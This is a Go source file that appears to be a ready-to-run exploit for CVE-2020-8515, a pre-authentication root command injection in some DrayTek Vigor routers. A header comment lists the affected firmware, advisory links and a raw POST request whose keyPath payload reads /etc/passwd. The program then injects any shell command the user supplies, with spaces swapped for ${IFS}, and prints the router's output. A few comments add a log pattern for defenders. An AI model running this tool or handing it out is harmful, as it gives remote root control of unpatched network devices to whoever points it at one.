CVE-2020-8515: DrayTek pre-auth remote root RCE
package main | |
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
and 1.4.4_Beta
You should upgrade as soon as possible to 1.5.1 firmware or later.
This issue has been fixed in Vigor3900/2960/300B v1.5.1.
Read more:
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
https://thehackernews.com/2020/03/draytek-network-hacking.html
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
Exploiting using keyPath:
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 1.2.3.4
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
*/
import ( | |
"fmt" | |
"io/ioutil" | |
"net/http" | |
"net/url" | |
"os" | |
"strings" | |
) | |
// usage prints the banner and a two-line synopsis to stdout. The program
// name is taken from os.Args[0] so the text matches however the binary
// was invoked.
func usage() {
	prog := os.Args[0]
	fmt.Println("CVE-2020-8515 exploit by @0xsha ")
	fmt.Printf("Usage : %s URL command\n", prog)
	fmt.Printf("E.G : %s http://1.2.3.4 \"uname -a\"\n", prog)
}
// main sends a single form-encoded POST to <URL>/cgi-bin/mainfunction.cgi and
// prints whatever the server returns. It expects two positional arguments:
// os.Args[1] is the base URL of the target and os.Args[2] is the shell command
// spliced into the keyPath form field. Any transport or read error ends the
// process with a fixed message; the underlying error value is never shown.
func main() {
	if len(os.Args) < 3 {
		usage()
		os.Exit(-1) // note: an exit code of -1 is reported to the shell as 255
	}
	targetUrl := os.Args[1]
	//cmd := "cat /etc/passwd"
	cmd := os.Args[2]
	// payload preparation
	vulnerableFile := "/cgi-bin/mainfunction.cgi"
	// specially crafted CMD
	// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
	//
	// The raw keyPath value is: a single quote, a newline, a "/bin/sh -c '...'"
	// line, a newline and a closing quote. Only the CMD placeholder is
	// substituted by the caller-supplied command below.
	payload := `'
/bin/sh -c 'CMD'
'`
	payload = strings.ReplaceAll(payload, "CMD", cmd)
	// Every space is rewritten to ${IFS} so the submitted value contains no
	// literal space character; the hand-written request in the header comment
	// uses the same substitution. Presumably a literal space does not survive
	// the vulnerable handler — not verifiable from this file.
	// Defender note: a login POST whose keyPath carries a quote and a newline
	// (%27 ... %0A once form-encoded) is the request shape to look for in
	// web-server logs.
	bypass := strings.ReplaceAll(payload, " ", "${IFS}")
	//PostForm call url encoder internally
	// NOTE(review): http.PostForm goes through http.DefaultClient, which has no
	// timeout, so an unresponsive host blocks this call indefinitely.
	resp, err := http.PostForm(targetUrl+vulnerableFile,
		url.Values{"action": {"login"}, "keyPath": {bypass}, "loginUser": {"a"}, "loginPwd": {"a"}})
	if err != nil {
		// err is discarded; only a fixed message reaches the user.
		fmt.Println("error connecting host")
		os.Exit(-1)
	}
	defer resp.Body.Close()
	// resp.StatusCode is not inspected: a non-2xx page is printed like any other.
	// ioutil.ReadAll is deprecated since Go 1.16 in favour of io.ReadAll; kept
	// as-is here.
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println("error reading data")
		os.Exit(-1)
	}
	fmt.Println(string(body))
}